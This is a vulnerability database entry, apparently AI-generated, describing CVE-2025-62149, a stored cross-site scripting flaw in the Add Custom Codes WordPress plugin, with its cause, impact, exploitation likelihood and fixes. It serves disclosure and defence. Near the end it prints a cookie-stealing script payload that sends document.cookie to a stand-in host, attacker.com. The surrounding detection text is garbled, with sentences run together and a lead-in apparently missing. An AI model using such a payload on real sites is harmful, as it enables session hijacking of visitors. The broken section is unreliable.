
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-62149 is a Stored Cross-Site Scripting (XSS) vulnerability in the Add Custom Codes WordPress plugin by SaifuMak. It affects all versions from n/a through 4.80, allowing authenticated administrators to inject malicious scripts via custom code inputs that are then executed in other users' browsers. The vulnerability was published on December 31, 2025, and assigned by Patchstack. It carries a CVSS v3.1 base score of 5.9 (Medium) (Red Hat CVE, Feedly).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The root cause is insufficient sanitization or escaping of user-supplied input in the plugin's custom code fields before it is stored and rendered in web pages. An authenticated attacker with administrator-level privileges can inject arbitrary JavaScript into these fields; the malicious script is then stored server-side and executed in the browsers of any user who visits the affected page. Exploitation requires high privileges (admin) and user interaction (a victim must load the page containing the injected payload), and the scope is changed, meaning the impact crosses the security boundary of the originating context (Feedly, Patchstack).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of site visitors or other administrators, potentially leading to session token theft, credential harvesting, defacement of web content, or redirection to malicious sites. The changed scope means the injected script can affect users beyond the administrator's own session, including lower-privileged users and unauthenticated visitors. Confidentiality, integrity, and availability are each assessed as Low impact (Feedly).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for CVE-2025-62149. The EPSS score is approximately 0.033%, indicating a very low probability of exploitation in the near term. The vulnerability requires high privileges (administrator access) to exploit, which significantly limits the attacker pool. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script>.<script> tags or JavaScript event handlers stored in the plugin's database entries (e.g., in the wp_options table under keys associated with the Add Custom Codes plugin).Users should update the Add Custom Codes plugin to version 4.81 or later, which contains the fix for this vulnerability. As a workaround, administrators should restrict access to the plugin's settings to only fully trusted accounts and audit existing custom code entries for any suspicious script injections. Disabling the plugin entirely until an update can be applied is also a viable temporary measure (Feedly, Wordfence).
Wordfence included CVE-2025-62149 in its weekly WordPress vulnerability report covering December 15, 2025 to January 4, 2026, noting it as part of a broader set of plugin vulnerabilities disclosed during that period (Wordfence). No significant independent researcher commentary or notable social media discussion has been identified for this vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."